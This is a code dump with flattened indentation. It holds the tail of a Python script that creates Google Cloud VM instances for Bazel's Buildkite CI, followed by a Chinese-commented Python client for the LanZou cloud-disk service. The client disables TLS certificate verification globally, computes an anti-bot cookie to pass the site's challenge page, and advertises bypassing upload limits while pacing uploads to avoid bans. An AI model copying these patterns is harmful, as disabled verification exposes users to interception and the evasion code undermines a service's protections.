debug('Running: {}'.format(' '.join(args)))
return subprocess.run(args, **kwargs)
def flags_for_instance(image_family, params):
cmd = ['--machine-type', params['machine_type']]
cmd.extend(['--network', 'buildkite'])
if 'startup_script' in params:
if 'windows' in image_family:
cmd.extend(['--metadata-from-file',
'windows-startup-script-ps1=' + params['startup_script']])
else:
cmd.extend(['--metadata-from-file', 'startup-script=' + params['startup_script']])
cmd.extend(['--min-cpu-platform', 'Intel Skylake'])
cmd.extend(['--boot-disk-type', 'pd-ssd'])
cmd.extend(['--boot-disk-size', params.get('boot_disk_size', '50GB')])
if 'local_ssd' in params:
cmd.extend(['--local-ssd', params['local_ssd']])
if 'persistent_disk' in params:
cmd.extend(['--disk',
'name={0},device-name={0},mode=rw,boot=no'.format(params['persistent_disk'])])
cmd.extend(['--image-project', 'bazel-public'])
cmd.extend(['--image-family', image_family])
cmd.extend(['--service-account', 'remote-account@bazel-public.iam.gserviceaccount.com'])
cmd.extend(['--scopes', 'cloud-platform'])
return cmd
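# For illustration only (not part of the original script): given the 'buildkite-windows'
# entry above, flags_for_instance() would return roughly
#   ['--machine-type', 'n1-standard-32', '--network', 'buildkite',
#    '--metadata-from-file', 'windows-startup-script-ps1=startup-windows.ps1',
#    '--min-cpu-platform', 'Intel Skylake', '--boot-disk-type', 'pd-ssd',
#    '--boot-disk-size', '50GB', '--local-ssd', 'interface=scsi',
#    '--image-project', 'bazel-public', '--image-family', 'buildkite-windows',
#    '--service-account', 'remote-account@bazel-public.iam.gserviceaccount.com',
#    '--scopes', 'cloud-platform']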
def delete_instance_template(template_name):
cmd = ['gcloud', 'compute', 'instance-templates', 'delete', template_name, '--quiet']
result = run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True)
if result.returncode != 0:
# It's not an error if 'delete' failed, because the template didn't exist in the first place.
# But we do want to error out on other unexpected errors.
if not re.search(r'The resource .* was not found', result.stdout):
raise Exception('"gcloud compute instance-templates delete" returned unexpected error:\n{}'.format(result.stdout))
return result
def create_instance_template(template_name, image_family, params):
cmd = ['gcloud', 'compute', 'instance-templates', 'create', template_name]
cmd.extend(flags_for_instance(image_family, params))
run(cmd)
def delete_instance(instance_name):
cmd = ['gcloud', 'compute', 'instances', 'delete', '--quiet', instance_name]
result = run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True)
if result.returncode != 0:
        # It's not an error if 'delete' failed, because the instance didn't exist in the first place.
        # But we do want to error out on other unexpected errors.
        if not re.search(r'The resource .* was not found', result.stdout):
            raise Exception('"gcloud compute instances delete" returned unexpected error:\n{}'.format(result.stdout))
return result
def create_instance(instance_name, image_family, params):
cmd = ['gcloud', 'compute', 'instances', 'create', instance_name]
cmd.extend(['--zone', LOCATION])
cmd.extend(flags_for_instance(image_family, params))
run(cmd)
def delete_instance_group(instance_group_name):
cmd = ['gcloud', 'compute', 'instance-groups', 'managed', 'delete', instance_group_name]
cmd.extend(['--zone', LOCATION])
cmd.extend(['--quiet'])
result = run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True)
if result.returncode != 0:
        # It's not an error if 'delete' failed, because the instance group didn't exist in the first place.
        # But we do want to error out on other unexpected errors.
if not re.search(r'The resource .* was not found', result.stdout):
raise Exception('"gcloud compute instance-groups managed delete" returned unexpected error:\n{}'.format(result.stdout))
return result
def create_instance_group(instance_group_name, template_name, count):
cmd = ['gcloud', 'compute', 'instance-groups', 'managed', 'create', instance_group_name]
cmd.extend(['--zone', LOCATION])
cmd.extend(['--base-instance-name', instance_group_name])
cmd.extend(['--template', template_name])
cmd.extend(['--size', str(count)])
return run(cmd)
def instance_group_task(instance_group_name, params):
image_family = params.get('image_family', instance_group_name)
template_name = instance_group_name + '-template'
if delete_instance_group(instance_group_name).returncode == 0:
print('Deleted existing instance group: {}'.format(instance_group_name))
if delete_instance_template(template_name).returncode == 0:
print('Deleted existing VM template: {}'.format(template_name))
create_instance_template(template_name, image_family, params)
create_instance_group(instance_group_name, template_name, params['count'])
def single_instance_task(instance_name, params):
image_family = params.get('image_family', instance_name)
if delete_instance(instance_name).returncode == 0:
print('Deleted existing instance: {}'.format(instance_name))
create_instance(instance_name, image_family, params)
def worker():
while True:
item = WORK_QUEUE.get()
if not item:
break
try:
if 'instance_group_name' in item:
instance_group_task(**item)
elif 'instance_name' in item:
single_instance_task(**item)
else:
raise Exception('Unknown task: {}'.format(item))
finally:
WORK_QUEUE.task_done()
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
# Put VM creation instructions into the work queue.
for instance_group_name, params in INSTANCE_GROUPS.items():
# If the user specified instance (group) names on the command-line, we process only these
# instances, otherwise we process all.
if argv and instance_group_name not in argv:
continue
# Do not automatically create user-specific instances. These must be specified explicitly
# on the command-line.
if instance_group_name.startswith(getpass.getuser()) and instance_group_name not in argv:
continue
WORK_QUEUE.put({
'instance_group_name': instance_group_name,
'params': params
})
for instance_name, params in SINGLE_INSTANCES.items():
# If the user specified instance (group) names on the command-line, we process only these
# instances, otherwise we process all.
if argv and instance_name not in argv:
continue
# Do not automatically create user-specific instances. These must be specified explicitly
# on the command-line.
if instance_name.startswith(getpass.getuser()) and instance_name not in argv:
continue
WORK_QUEUE.put({
'instance_name': instance_name,
'params': params
})
# Spawn worker threads that will create the VMs.
threads = []
for _ in range(WORK_QUEUE.qsize()):
t = threading.Thread(target=worker)
t.start()
threads.append(t)
# Wait for all VMs to be created.
WORK_QUEUE.join()
# Signal worker threads to exit.
for _ in range(len(threads)):
WORK_QUEUE.put(None)
# Wait for worker threads to exit.
for t in threads:
t.join()
return 0
if __name__ == '__main__':
sys.exit(main())
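# Illustrative usage (not documented in the original script):
#   ./create_instances.py                      -> recreate every non-personal instance/group
#   ./create_instances.py buildkite-windows    -> recreate only the named instance group
#   ./create_instances.py "$USER-ubuntu1604"   -> personal VMs must always be named explicitly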
|
core.py
|
"""
蓝奏网盘 API,封装了对蓝奏云的各种操作,解除了上传格式、大小限制
"""
import os
import pickle
import re
import shutil
from threading import Thread
from time import sleep
from datetime import datetime
from urllib3 import disable_warnings
from random import shuffle, uniform
from typing import List, Tuple
from concurrent.futures import ThreadPoolExecutor, as_completed
import requests
from requests_toolbelt import MultipartEncoder, MultipartEncoderMonitor
from urllib3.exceptions import InsecureRequestWarning
from lanzou.api.models import FileList, FolderList
from lanzou.api.types import *
from lanzou.api.utils import *
from lanzou.debug import logger
__all__ = ['LanZouCloud']
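# Minimal usage sketch, added for illustration only: it is not part of the published
# API (`__all__` is unchanged) and is never called. The cookie key names below are an
# assumption -- pass whatever cookies your logged-in browser session actually contains.
def _example_usage():
    lzy = LanZouCloud()
    # cookie keys are placeholders / an assumption, not guaranteed by this module
    if lzy.login_by_cookie({'ylogin': '...', 'phpdisk_info': '...'}) != LanZouCloud.SUCCESS:
        return
    for f in lzy.get_file_list(folder_id=-1):  # -1 is the root folder
        print(f.name, f.size, f.time)
    folders, _paths = lzy.get_dir_list(folder_id=-1)
    for d in folders:
        print(d.name, d.id)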
class LanZouCloud(object):
FAILED = -1
SUCCESS = 0
ID_ERROR = 1
PASSWORD_ERROR = 2
LACK_PASSWORD = 3
ZIP_ERROR = 4
MKDIR_ERROR = 5
URL_INVALID = 6
FILE_CANCELLED = 7
PATH_ERROR = 8
NETWORK_ERROR = 9
CAPTCHA_ERROR = 10
OFFICIAL_LIMITED = 11
def __init__(self):
self._session = requests.Session()
        self._timeout = 5  # per-request timeout (excluding time spent downloading the response body)
        self._max_size = 100  # single-file size limit, in MB
        self._upload_delay = (0, 0)  # delay range between uploads of big-file chunks
        self._host_url = 'https://www.lanzoub.com'
        self._doupload_url = 'https://pc.woozooo.com/doupload.php'
        self._account_url = 'https://pc.woozooo.com/account.php'
        self._mydisk_url = 'https://pc.woozooo.com/mydisk.php'
        self._cookies = None
        self._headers = {
            'User-Agent': USER_AGENT,
            'Referer': self._mydisk_url,
            'Accept-Language': 'zh-CN,zh;q=0.9',  # required when extracting direct links, otherwise no data is returned
        }
        disable_warnings(InsecureRequestWarning)  # globally silence SSL warnings
        Thread(target=self._choose_lanzou_host).start()
def _get(self, url, **kwargs):
try:
kwargs.setdefault('timeout', self._timeout)
kwargs.setdefault('headers', self._headers)
return self._session.get(url, verify=False, **kwargs)
except requests.Timeout:
logger.warning("Encountered timeout error while requesting network!")
raise TimeoutError
except (requests.RequestException, Exception) as e:
logger.error(f"Unexpected error: e={e}")
def _post(self, url, data, **kwargs):
try:
kwargs.setdefault('timeout', self._timeout)
kwargs.setdefault('headers', self._headers)
return self._session.post(url, data, verify=False, **kwargs)
except requests.Timeout:
logger.warning("Encountered timeout error while requesting network!")
raise TimeoutError
except (requests.RequestException, Exception) as e:
logger.error(f"Unexpected error: e={e}")
def _get_response_host(self, info):
"""获取蓝奏响应的下载 host 域名"""
new_host = info.get("is_newd", "")
if new_host and new_host != self._host_url:
self._host_url = new_host
def _choose_lanzou_host(self):
"""选择一个可用的蓝奏域名"""
hosts = ("lanzoub", "lanzouw", "lanzoui")
for i in hosts:
host = f"https://www.{i}.com"
try:
requests.get(host, headers=self._headers, timeout=3, verify=False)
self._host_url = host
break
except:
pass
def set_max_size(self, max_size=100) -> int:
"""设置单文件大小限制(会员用户可超过 100M)"""
if max_size < 1:
return LanZouCloud.FAILED
self._max_size = max_size
return LanZouCloud.SUCCESS
def set_upload_delay(self, t_range: tuple) -> int:
"""设置上传大文件数据块时,相邻两次上传之间的延时,减小被封号的可能"""
if 0 <= t_range[0] <= t_range[1]:
self._upload_delay = t_range
return LanZouCloud.SUCCESS
return LanZouCloud.FAILED
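        # Illustrative note: e.g. set_upload_delay((2, 5)) makes _upload_big_file (below)
        # sleep a random 2-5 s, via uniform(), between consecutive chunk uploads.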
def login(self, username, passwd) -> int:
"""
登录蓝奏云控制台已弃用]
对某些用户可能有用
"""
self._session.cookies.clear()
login_data = {"task": 3, "setSessionId": "", "setToken": "", "setSig": "",
"setScene": "", "uid": username, "pwd": passwd}
phone_header = {
"User-Agent": "Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.4051.0 Mobile Safari/537.36"}
html = self._get(self._account_url)
if not html:
return LanZouCloud.NETWORK_ERROR
formhash = re.findall(r'name="formhash" value="(.+?)"', html.text)
if not formhash:
logger.error("formhash is None!")
return LanZouCloud.FAILED
login_data['formhash'] = formhash[0]
html = self._post(self._mydisk_url, login_data, headers=phone_header)
if not html:
return LanZouCloud.NETWORK_ERROR
try:
if '成功' in html.json()['info']:
self._cookies = html.cookies.get_dict()
self._session.cookies.update(self._cookies)
return LanZouCloud.SUCCESS
except ValueError:
pass
return LanZouCloud.FAILED
def get_cookie(self) -> dict:
"""获取用户 Cookie"""
return self._cookies
def login_by_cookie(self, cookie: dict) -> int:
"""通过cookie登录"""
self._session.cookies.update(cookie)
html = self._get(self._account_url)
if not html:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.FAILED if '网盘用户登录' in html.text else LanZouCloud.SUCCESS
def logout(self) -> int:
"""注销"""
html = self._get(self._account_url, params={'action': 'logout'})
if not html:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.SUCCESS if '退出系统成功' in html.text else LanZouCloud.FAILED
def delete(self, fid, is_file=True) -> int:
"""把网盘的文件、无子文件夹的文件夹放到回收站"""
post_data = {'task': 6, 'file_id': fid} if is_file else {'task': 3, 'folder_id': fid}
result = self._post(self._doupload_url, post_data)
if not result:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.SUCCESS if result.json()['zt'] == 1 else LanZouCloud.FAILED
def clean_rec(self) -> int:
"""清空回收站"""
post_data = {'action': 'delete_all', 'task': 'delete_all'}
html = self._get(self._mydisk_url, params={'item': 'recycle', 'action': 'files'})
if not html:
return LanZouCloud.NETWORK_ERROR
post_data['formhash'] = re.findall(r'name="formhash" value="(.+?)"', html.text)[0] # 设置表单 hash
html = self._post(self._mydisk_url + '?item=recycle', post_data)
if not html:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.SUCCESS if '清空回收站成功' in html.text else LanZouCloud.FAILED
def get_rec_dir_list(self) -> FolderList:
"""获取回收站文件夹列表"""
# 回收站中文件(夹)名只能显示前 17 个中文字符或者 34 个英文字符,如果这些字符相同,则在文件(夹)名后添加 (序号) ,以便区分
html = self._get(self._mydisk_url, params={'item': 'recycle', 'action': 'files'})
if not html:
return FolderList()
dirs = re.findall(r'folder_id=(\d+).+?> (.+?)\.{0,3}</a>.*\n+.*<td.+?>(.+?)</td>.*\n.*<td.+?>(.+?)</td>',
html.text)
        all_dir_list = FolderList()  # folder info list
        dir_name_list = []  # folder name list
        counter = 1  # duplicate-name counter
for fid, name, size, time in dirs:
if name in dir_name_list: # 文件夹名前 17 个中文或 34 个英文重复
counter += 1
name = f'{name}({counter})'
else:
counter = 1
dir_name_list.append(name)
all_dir_list.append(RecFolder(name, int(fid), size, time, None))
return all_dir_list
def get_rec_file_list(self, folder_id=-1) -> FileList:
"""获取回收站文件列表"""
if folder_id == -1: # 列出回收站根目录文件
# 回收站文件夹中的文件也会显示在根目录
html = self._get(self._mydisk_url, params={'item': 'recycle', 'action': 'files'})
if not html:
return FileList()
html = remove_notes(html.text)
files = re.findall(
r'fl_sel_ids[^\n]+value="(\d+)".+?filetype/(\w+)\.gif.+?/>\s?(.+?)(?:\.{3})?</a>.+?<td.+?>([\d\-]+?)</td>',
html, re.DOTALL)
file_list = FileList()
file_name_list = []
counter = 1
for fid, ftype, name, time in sorted(files, key=lambda x: x[2]):
if not name.endswith(ftype): # 防止文件名太长导致丢失了文件后缀
name = name + '.' + ftype
if name in file_name_list: # 防止长文件名前 17:34 个字符相同重名
counter += 1
name = f'{name}({counter})'
else:
counter = 1
file_name_list.append(name)
file_list.append(RecFile(name, int(fid), ftype, size='', time=time))
return file_list
else: # 列出回收站中文件夹内的文件,信息只有部分文件名和文件大小
para = {'item': 'recycle', 'action': 'folder_restore', 'folder_id': folder_id}
html = self._get(self._mydisk_url, params=para)
if not html or '此文件夹没有包含文件' in html.text:
return FileList()
html = remove_notes(html.text)
files = re.findall(
r'com/(\d+?)".+?filetype/(\w+)\.gif.+?/> (.+?)(?:\.{3})?</a> <font color="#CCCCCC">\((.+?)\)</font>',
html)
file_list = FileList()
file_name_list = []
counter = 1
for fid, ftype, name, size in sorted(files, key=lambda x: x[2]):
if not name.endswith(ftype): # 防止文件名太长丢失后缀
name = name + '.' + ftype
if name in file_name_list:
counter += 1
name = f'{name}({counter})' # 防止文件名太长且前17个字符重复
else:
counter = 1
file_name_list.append(name)
file_list.append(RecFile(name, int(fid), ftype, size=size, time=''))
return file_list
def get_rec_all(self):
"""获取整理后回收站的所有信息"""
root_files = self.get_rec_file_list() # 回收站根目录文件列表
folder_list = FolderList() # 保存整理后的文件夹列表
for folder in self.get_rec_dir_list(): # 遍历所有子文件夹
this_folder = RecFolder(folder.name, folder.id, folder.size, folder.time, FileList())
for file in self.get_rec_file_list(folder.id): # 文件夹内的文件属性: name,id,type,size
if root_files.find_by_id(file.id): # 根目录存在同名文件
file_time = root_files.pop_by_id(file.id).time # 从根目录删除, time 信息用来补充文件夹中的文件
file = file._replace(time=file_time) # 不能直接更新 namedtuple, 需要 _replace
this_folder.files.append(file)
else: # 根目录没有同名文件(用户手动删了),文件还在文件夹中,只是根目录不显示,time 信息无法补全了
file = file._replace(time=folder.time) # 那就设置时间为文件夹的创建时间
this_folder.files.append(file)
folder_list.append(this_folder)
return root_files, folder_list
def delete_rec(self, fid, is_file=True) -> int:
"""彻底删除回收站文件(夹)"""
# 彻底删除后需要 1.5s 才能调用 get_rec_file() ,否则信息没有刷新,被删掉的文件似乎仍然 "存在"
if is_file:
para = {'item': 'recycle', 'action': 'file_delete_complete', 'file_id': fid}
post_data = {'action': 'file_delete_complete', 'task': 'file_delete_complete', 'file_id': fid}
else:
para = {'item': 'recycle', 'action': 'folder_delete_complete', 'folder_id': fid}
post_data = {'action': 'folder_delete_complete', 'task': 'folder_delete_complete', 'folder_id': fid}
html = self._get(self._mydisk_url, params=para)
if not html:
return LanZouCloud.NETWORK_ERROR
# 此处的 formhash 与 login 时不同,不要尝试精简这一步
post_data['formhash'] = re.findall(r'name="formhash" value="(\w+?)"', html.text)[0] # 设置表单 hash
html = self._post(self._mydisk_url + '?item=recycle', post_data)
if not html:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.SUCCESS if '删除成功' in html.text else LanZouCloud.FAILED
def delete_rec_multi(self, files, folders) -> int:
"""彻底删除回收站多个文件(夹)"""
# 与 recovery_all 几乎一样,task 表单值不一样
if not files and not folders:
return LanZouCloud.FAILED
para = {'item': 'recycle', 'action': 'files'}
post_data = {'action': 'files', 'task': 'delete_complete_recycle'}
if folders:
post_data['fd_sel_ids[]'] = folders
if files:
post_data['fl_sel_ids[]'] = files
html = self._get(self._mydisk_url, params=para)
if not html:
return LanZouCloud.NETWORK_ERROR
post_data['formhash'] = re.findall(r'name="formhash" value="(\w+?)"', html.text)[0] # 设置表单 hash
html = self._post(self._mydisk_url + '?item=recycle', post_data)
if not html:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.SUCCESS if '删除成功' in html.text else LanZouCloud.FAILED
def recovery(self, fid, is_file=True) -> int:
"""从回收站恢复文件"""
if is_file:
para = {'item': 'recycle', 'action': 'file_restore', 'file_id': fid}
post_data = {'action': 'file_restore', 'task': 'file_restore', 'file_id': fid}
else:
para = {'item': 'recycle', 'action': 'folder_restore', 'folder_id': fid}
post_data = {'action': 'folder_restore', 'task': 'folder_restore', 'folder_id': fid}
html = self._get(self._mydisk_url, params=para)
if not html:
return LanZouCloud.NETWORK_ERROR
post_data['formhash'] = re.findall(r'name="formhash" value="(\w+?)"', html.text)[0] # 设置表单 hash
html = self._post(self._mydisk_url + '?item=recycle', post_data)
if not html:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.SUCCESS if '恢复成功' in html.text else LanZouCloud.FAILED
def recovery_multi(self, files, folders) -> int:
"""从回收站恢复多个文件(夹)"""
if not files and not folders:
return LanZouCloud.FAILED
para = {'item': 'recycle', 'action': 'files'}
post_data = {'action': 'files', 'task': 'restore_recycle'}
if folders:
post_data['fd_sel_ids[]'] = folders
if files:
post_data['fl_sel_ids[]'] = files
html = self._get(self._mydisk_url, params=para)
if not html:
return LanZouCloud.NETWORK_ERROR
post_data['formhash'] = re.findall(r'name="formhash" value="(.+?)"', html.text)[0] # 设置表单 hash
html = self._post(self._mydisk_url + '?item=recycle', post_data)
if not html:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.SUCCESS if '恢复成功' in html.text else LanZouCloud.FAILED
def recovery_all(self) -> int:
"""从回收站恢复所有文件(夹)"""
para = {'item': 'recycle', 'action': 'restore_all'}
post_data = {'action': 'restore_all', 'task': 'restore_all'}
first_page = self._get(self._mydisk_url, params=para)
if not first_page:
return LanZouCloud.NETWORK_ERROR
post_data['formhash'] = re.findall(r'name="formhash" value="(.+?)"', first_page.text)[0] # 设置表单 hash
second_page = self._post(self._mydisk_url + '?item=recycle', post_data)
if not second_page:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.SUCCESS if '还原成功' in second_page.text else LanZouCloud.FAILED
def get_file_list(self, folder_id=-1) -> FileList:
"""获取文件列表"""
page = 1
file_list = FileList()
while True:
post_data = {'task': 5, 'folder_id': folder_id, 'pg': page}
resp = self._post(self._doupload_url, post_data)
if not resp: # 网络异常,重试
continue
else:
resp = resp.json()
if resp["info"] == 0:
break # 已经拿到了全部的文件信息
else:
page += 1 # 下一页
# 文件信息处理
if resp["zt"] == 9: # login not
logger.debug(f"Not login resp={resp}")
break
for file in resp["text"]:
file_list.append(File(
id=int(file['id']),
name=file['name_all'].replace("&", "&"),
time=file['time'], # 上传时间
size=file['size'].replace(",", ""), # 文件大小
type=file['name_all'].split('.')[-1], # 文件类型
downs=int(file['downs']), # 下载次数
has_pwd=True if int(file['onof']) == 1 else False, # 是否存在提取码
has_des=True if int(file['is_des']) == 1 else False # 是否存在描述
))
return file_list
def get_dir_list(self, folder_id=-1) -> Tuple[FolderList, FolderList]:
"""获取子文件夹列表与全路径"""
folder_list = FolderList()
path_list = FolderList()
post_data = {'task': 47, 'folder_id': folder_id}
resp = self._post(self._doupload_url, post_data)
if resp:
resp = resp.json()
for folder in resp["text"]:
if "fol_id" not in folder: # 切换用户时,有可能得到的是一个字符串 (╥╯^╰╥)
continue
folder_list.append(Folder(
id=int(folder['fol_id']),
name=folder['name'],
has_pwd=True if int(folder['onof']) == 1 else False,
desc=folder['folder_des'][1:-1]
))
if folder_id == -1 or resp["info"]: # 如果 folder_id 有误,就返回空 list
path_list.append(FolderId('LanZouCloud', -1, '根目录', -1))
for folder in resp["info"]:
if "folderid" not in folder:
continue
path_list.append(FolderId(
name=folder['name'],
id=int(folder['folderid']),
desc=folder['folder_des'][1:-1],
now=int(folder['now'])
))
return folder_list, path_list
def clean_ghost_folders(self):
"""清除网盘中的幽灵文件夹"""
# 可能有一些文件夹,网盘和回收站都看不见它,但是它确实存在,移动文件夹时才会显示
# 如果不清理掉,不小心将文件移动进去就完蛋了
        def _clean(fid):
            sub_folders, _ = self.get_dir_list(fid)  # get_dir_list returns (folders, full paths)
            for folder in sub_folders:
                real_folders.append(folder)
                _clean(folder.id)
folder_with_ghost = self.get_move_folders()
folder_with_ghost.pop_by_id(-1) # 忽视根目录
real_folders = FolderList()
_clean(-1)
for folder in folder_with_ghost:
if not real_folders.find_by_id(folder.id):
logger.debug(f"Delete ghost folder: {folder.name} #{folder.id}")
if self.delete(folder.id, False) != LanZouCloud.SUCCESS:
return LanZouCloud.FAILED
if self.delete_rec(folder.id, False) != LanZouCloud.SUCCESS:
return LanZouCloud.FAILED
return LanZouCloud.SUCCESS
def get_file_info_by_url(self, share_url, pwd='') -> FileDetail:
"""获取文件各种信息(包括下载直链)
:param share_url: 文件分享链接
:param pwd: 文件提取码(如果有的话)
"""
prop_host = re.sub(r"lanzou(\w)", "lanzoub", self._host_url)
share_url = re.sub(r"lanzou(\w)", "lanzoub", share_url)
if not is_file_url(share_url): # 非文件链接返回错误
return FileDetail(LanZouCloud.URL_INVALID, pwd=pwd, url=share_url)
first_page = self._get(share_url) # 文件分享页面(第一页)
if not first_page:
return FileDetail(LanZouCloud.NETWORK_ERROR, pwd=pwd, url=share_url)
if "acw_sc__v2" in first_page.text:
# 在页面被过多访问或其他情况下,有时候会先返回一个加密的页面,其执行计算出一个acw_sc__v2后放入页面后再重新访问页面才能获得正常页面
# 若该页面进行了js加密,则进行解密,计算acw_sc__v2,并加入cookie
acw_sc__v2 = calc_acw_sc__v2(first_page.text)
self._session.cookies.set("acw_sc__v2", acw_sc__v2)
logger.debug(f"Set Cookie: acw_sc__v2={acw_sc__v2}")
first_page = self._get(share_url) # 文件分享页面(第一页)
if not first_page:
return FileDetail(LanZouCloud.NETWORK_ERROR, pwd=pwd, url=share_url)
first_page = remove_notes(first_page.text) # 去除网页里的注释
if '文件取消' in first_page or '文件不存在' in first_page:
return FileDetail(LanZouCloud.FILE_CANCELLED, pwd=pwd, url=share_url)
# 这里获取下载直链 304 重定向前的链接
if 'id="pwdload"' in first_page or 'id="passwddiv"' in first_page or '输入密码' in first_page: # 文件设置了提取码时
if len(pwd) == 0:
return FileDetail(LanZouCloud.LACK_PASSWORD, pwd=pwd, url=share_url) # 没给提取码直接退出
# data : 'action=downprocess&sign=AGZRbwEwU2IEDQU6BDRUaFc8DzxfMlRjCjTPlVkWzFSYFY7ATpWYw_c_c&p='+pwd,
sign = re.search(r"sign=(\w+?)&", first_page)
sign = sign.group(1) if sign else ""
post_data = {'action': 'downprocess', 'sign': sign, 'p': pwd}
link_info = self._post(prop_host + '/ajaxm.php', post_data) # 保存了重定向前的链接信息和文件名
second_page = self._get(share_url) # 再次请求文件分享页面,可以看见文件名,时间,大小等信息(第二页)
if not link_info or not second_page.text:
return FileDetail(LanZouCloud.NETWORK_ERROR, pwd=pwd, url=share_url)
link_info = link_info.json()
second_page = remove_notes(second_page.text)
# 提取文件信息
f_name = link_info['inf'].replace("*", "_")
f_size = re.search(r'大小.+?(\d[\d\.,]+\s?[BKM]?)<', second_page)
f_size = f_size.group(1) if f_size else ''
f_time = re.search(r'class="n_file_infos">(.+?)</span>', second_page)
f_time = f_time.group(1) if f_time else ''
f_desc = re.search(r'class="n_box_des">(.*?)</div>', second_page)
f_desc = f_desc.group(1) if f_desc else ''
else: # 文件没有设置提取码时,文件信息都暴露在分享页面上
para = re.search(r'<iframe.*?src="(.+?)"', first_page).group(1) # 提取下载页面 URL 的参数
logger.debug("params",para)
# 文件名位置变化很多
f_name = re.search(r"<title>(.+?) - 蓝奏云</title>", first_page) or \
re.search(r'<div class="filethetext".+?>([^<>]+?)</div>', first_page) or \
re.search(r'<div style="font-size.+?>([^<>].+?)</div>', first_page) or \
re.search(r"var filename = '(.+?)';", first_page) or \
re.search(r'id="filenajax">(.+?)</div>', first_page) or \
re.search(r'<div class="b"><span>([^<>]+?)</span></div>', first_page)
f_name = f_name.group(1) if f_name else "未匹配到文件名"
f_time = re.search(r'>(\d+\s?[秒天分小][钟时]?前|[昨前]天\s?[\d:]+?|\d+\s?天前|\d{4}-\d\d-\d\d)<', first_page)
f_time = f_time.group(1) if f_time else ''
f_size = re.search(r'大小.+?(\d[\d\.,]+\s?[BKM]?)<', first_page) or \
re.search(r'大小:(.+?)</div>', first_page) # VIP 分享页面
f_size = f_size.group(1) if f_size else ''
f_desc = re.search(r'文件描述.+?</span><br>\n?\s*(.*?)\s*</td>', first_page)
f_desc = f_desc.group(1) if f_desc else ''
logger.debug("params get",prop_host)
first_page = self._get(prop_host + para)
if not first_page:
return FileDetail(LanZouCloud.NETWORK_ERROR, name=f_name, time=f_time, size=f_size, desc=f_desc, pwd=pwd, url=share_url)
first_page = remove_notes(first_page.text)
# 一般情况 sign 的值就在 data 里,有时放在变量后面
sign = re.search(r"'sign':(.+?),", first_page).group(1)
if len(sign) < 20: # 此时 sign 保存在变量里面, 变量名是 sign 匹配的字符
sign = re.search(rf"var {sign}\s*=\s*'(.+?)';", first_page).group(1)
post_data = {'action': 'downprocess', 'sign': sign, 'ves': 1}
link_info = self._post(prop_host + '/ajaxm.php', post_data)
if not link_info:
return FileDetail(LanZouCloud.NETWORK_ERROR, name=f_name, time=f_time, size=f_size, desc=f_desc, pwd=pwd, url=share_url)
link_info = link_info.json()
# 这里开始获取文件直链
if link_info['zt'] != 1: # 返回信息异常,无法获取直链
return FileDetail(LanZouCloud.FAILED,
name=f_name, time=f_time, size=f_size,
desc=f_desc, pwd=pwd, url=share_url)
fake_url = link_info['dom'] + '/file/' + link_info['url'] # 假直连,存在流量异常检测
download_page = self._get(fake_url, allow_redirects=False)
if not download_page:
return FileDetail(LanZouCloud.NETWORK_ERROR,
name=f_name, time=f_time, size=f_size,
desc=f_desc, pwd=pwd, url=share_url)
download_page.encoding = 'utf-8'
download_page_html = remove_notes(download_page.text)
if '网络异常' not in download_page_html: # 没有遇到验证码
direct_url = download_page.headers['Location'] # 重定向后的真直链
else: # 遇到验证码,验证后才能获取下载直链
file_token = re.findall("'file':'(.+?)'", download_page_html)[0]
file_sign = re.findall("'sign':'(.+?)'", download_page_html)[0]
check_api = 'https://vip.d0.baidupan.com/file/ajax.php'
post_data = {'file': file_token, 'el': 2, 'sign': file_sign}
sleep(2) # 这里必需等待2s, 否则直链返回 ?SignError
resp = self._post(check_api, post_data)
direct_url = resp.json()['url']
if not direct_url:
return FileDetail(LanZouCloud.CAPTCHA_ERROR,
name=f_name, time=f_time, size=f_size,
desc=f_desc, pwd=pwd, url=share_url)
f_type = f_name.split('.')[-1]
return FileDetail(LanZouCloud.SUCCESS,
name=f_name, size=f_size, type=f_type, time=f_time,
desc=f_desc, pwd=pwd, url=share_url, durl=direct_url)
def get_file_info_by_id(self, file_id) -> FileDetail:
"""通过 id 获取文件信息"""
info = self.get_share_info(file_id)
if info.code != LanZouCloud.SUCCESS:
return FileDetail(info.code)
return self.get_file_info_by_url(info.url, info.pwd)
def get_durl_by_url(self, share_url, pwd='') -> DirectUrlInfo:
"""通过分享链接获取下载直链"""
file_info = self.get_file_info_by_url(share_url, pwd)
if file_info.code != LanZouCloud.SUCCESS:
return DirectUrlInfo(file_info.code, '', '')
return DirectUrlInfo(LanZouCloud.SUCCESS, file_info.name, file_info.durl)
def get_durl_by_id(self, file_id) -> DirectUrlInfo:
"""登录用户通过id获取直链"""
info = self.get_share_info(file_id, is_file=True) # 能获取直链,一定是文件
return self.get_durl_by_url(info.url, info.pwd)
def get_share_info(self, fid, is_file=True) -> ShareInfo:
"""获取文件(夹)提取码、分享链接"""
post_data = {'task': 22, 'file_id': fid} if is_file else {'task': 18, 'folder_id': fid} # 获取分享链接和密码用
f_info = self._post(self._doupload_url, post_data)
if not f_info:
return ShareInfo(LanZouCloud.NETWORK_ERROR)
else:
f_info = f_info.json()['info']
# id 有效性校验
if ('f_id' in f_info.keys() and f_info['f_id'] == 'i') or ('name' in f_info.keys() and not f_info['name']):
return ShareInfo(LanZouCloud.ID_ERROR)
# onof=1 时,存在有效的提取码; onof=0 时不存在提取码,但是 pwd 字段还是有一个无效的随机密码
self._get_response_host(f_info)
pwd = f_info['pwd'] if int(f_info['onof']) == 1 else ''
if 'f_id' in f_info.keys(): # 说明返回的是文件的信息
url = f_info['is_newd'] + '/' + f_info['f_id'] # 文件的分享链接需要拼凑
file_info = self._post(self._doupload_url, {'task': 12, 'file_id': fid}) # 文件信息
if not file_info:
return ShareInfo(LanZouCloud.NETWORK_ERROR)
